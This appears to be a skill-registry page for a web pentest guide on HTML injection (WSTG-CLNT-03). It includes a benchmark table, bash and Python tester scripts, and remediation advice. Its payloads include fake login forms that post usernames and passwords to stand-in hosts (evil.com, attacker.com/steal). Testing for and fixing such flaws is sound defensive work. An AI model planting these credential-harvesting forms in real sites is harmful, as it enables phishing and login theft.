Install any skill in seconds. Free to start, no credit card required.
Get Started Free →Testing for HTML Injection
| Test case | Without → With | Effect | Δ tokens | Δ turns |
|---|---|---|---|---|
| case-13 | ✗→✓ | ▲ Improved | -35% | 0% |
| case-14 | ✗→✓ | ▲ Improved | -39% | 0% |
| case-06 | ✓→✗ | ▼ Worse | 125% | 0% |
| case-12 | ✓→✗ | ▼ Worse | 39% | 0% |
| case-03 | ✓→✓ | = Same ✓ | 44% | 0% |
WSTG-CLNT-03
Testing for HTML Injection
HTML injection allows attackers to inject arbitrary HTML content into web pages. While not as severe as XSS (no script execution), it can be used for phishing, defacement, or to manipulate page content to trick users.
bash#!/bin/bash TARGET="https://target.com" payloads=( "<h1>Injected</h1>" "<a href='https://evil.com'>Click here</a>" "<form action='https://evil.com'><input name='password'><input type='submit'></form>" "<img src='https://evil.com/logo.png'>" "<marquee>HTML Injection</marquee>" ) for payload in "${payloads[@]}"; do encoded=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$payload'))") response=$(curl -s "$TARGET/search?q=$encoded") if echo "$response" | grep -q "<h1>Injected\|<a href='\|<form action="; then echo "[VULN] HTML injection: $payload" fi done
html<!-- Test injecting a fake login form --> <form action="https://attacker.com/steal" method="POST"> <h2>Session Expired - Please Re-login</h2> <input name="username" placeholder="Username" /> <input name="password" type="password" placeholder="Password" /> <button type="submit">Login</button> </form>
python#!/usr/bin/env python3 import requests import html class HTMLInjectionTester: def __init__(self, base_url): self.base_url = base_url self.findings = [] def test_injection(self, endpoint, param): """Test for HTML injection""" print(f"[*] Testing HTML injection: {endpoint}?{param}") payloads = [ ("<h1>TEST</h1>", "<h1>TEST</h1>"), ("<b>bold</b>", "<b>bold</b>"), ("<a href=x>link</a>", "<a href"), ("<img src=x>", "<img src"), ("<table><tr><td>cell</td></tr></table>", "<table>"), ] for payload, check in payloads: url = f"{self.base_url}{endpoint}" response = requests.get(url, params={param: payload}) # Check if HTML is rendered (not encoded) if check in response.text and html.escape(check) not in response.text: print(f"[VULN] HTML injection with: {payload[:30]}") self.findings.append({ "endpoint": endpoint, "parameter": param, "payload": payload, "severity": "Medium" }) break # Usage tester = HTMLInjectionTester("https://target.com") tester.test_injection("/search", "q") tester.test_injection("/profile", "bio")
python# Always HTML encode user output import html user_input = "<h1>Malicious</h1>" safe_output = html.escape(user_input) # Result: <h1>Malicious</h1>
javascript// JavaScript - use textContent instead of innerHTML element.textContent = userInput // Safe // NOT: element.innerHTML = userInput; // Unsafe
| Finding | CVSS | Severity | | --------------------------- | ---- | -------- | | HTML injection (phishing) | 4.3 | Medium | | HTML injection (defacement) | 3.5 | Low |
| CWE ID | Title | | ---------- | --------------------------------------------------- | | CWE-80 | Improper Neutralization of Script-Related HTML Tags |
[ ] Input fields tested
[ ] URL parameters tested
[ ] Error messages checked
[ ] HTML encoding verified
[ ] Findings documentedOther measured skills in the registry, with their headline benchmark lift.